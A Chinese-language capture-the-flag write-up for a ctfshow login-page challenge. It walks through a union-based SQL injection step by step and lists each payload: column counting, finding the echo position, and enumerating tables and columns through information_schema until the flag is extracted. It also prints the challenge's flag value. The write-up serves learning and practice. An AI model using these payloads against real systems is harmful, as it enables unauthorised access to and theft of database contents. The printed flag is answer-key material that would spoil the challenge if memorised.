打开题目链接,是一个登录框,尝试弱口令登录
没什么反应
尝试万能密码登录
页面发生了变化
并未登录进去,但是有回显,大概率是SQL注入了
这里尝试了很久,尝试过程就不写了,最终判断它的注入点在用户名,而不是密码,密码随便输,而且--+的注释不行,这里要用#来注释。
成功闭合之后先判断字段数
' or 1=1 order by 3 #
正常回显
' or 1=1 order by 4 #
无回显,说明只有3列
判断回显位
' or 1=1 union select 1,2,3 #
在2号位
查数据库名
' or 1=1 union select 1,database(),3 #
数据库名为 web2
查数据库版本
' or 1=1 union select 1,version(),3 #
MariaDB,第一次遇见不是在mysql下的
这里说一下,因为mysql 5.0及其以上的都会自带一个叫information_schema的数据库,相当于是一个已知的数据库,并且该数据库下储存了所有数据库的所以信息。
尝试查询数据库名为web2下的所有表名
' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#
发现该数据库下有两个表:flag,user
查询数据库名为web2下表名为flag的列名信息
' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'#
该表下的列名也为flag
直接查该列的具体字段信息
' or 1=1 union select 1,flag,3 from web2.flag #
拿到flag
ctfshow{6ce6e249-b399-480c-ae37-93793eea88e2}
前面我们说过,information_schema这个数据库下面包含了所有数据库的所有信息
我们来获取一下所有数据库的数据库名
' or 1=1 union select 1,schema_name,3 from information_schema.schemata #
mysql数据库、web2数据库以及其他所有数据库的所有信息都会储存在information_schema这个数据库下,这也是为什么我们可以借助information_schema这个数据库来查询到其他数据库的信息。
